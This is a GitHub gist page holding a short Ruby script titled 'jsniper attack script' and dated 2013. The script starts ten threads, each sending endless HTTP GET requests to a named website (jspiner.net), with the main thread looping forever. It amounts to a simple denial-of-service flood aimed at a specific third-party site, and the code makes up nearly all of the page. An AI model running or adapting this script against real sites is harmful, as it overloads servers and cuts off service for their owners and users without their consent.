Skip to content

Instantly share code, notes, and snippets.

@pjc0247
Created February 13, 2013 14:16
Show Gist options
  • Save pjc0247/4944908 to your computer and use it in GitHub Desktop.
Save pjc0247/4944908 to your computer and use it in GitHub Desktop.
jsniper attack script
require 'net/http'
10.times do
Thread.new do
while true
uri = URI('http://jspiner.net/')
Net::HTTP.get(uri)
end
end
end
while true
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment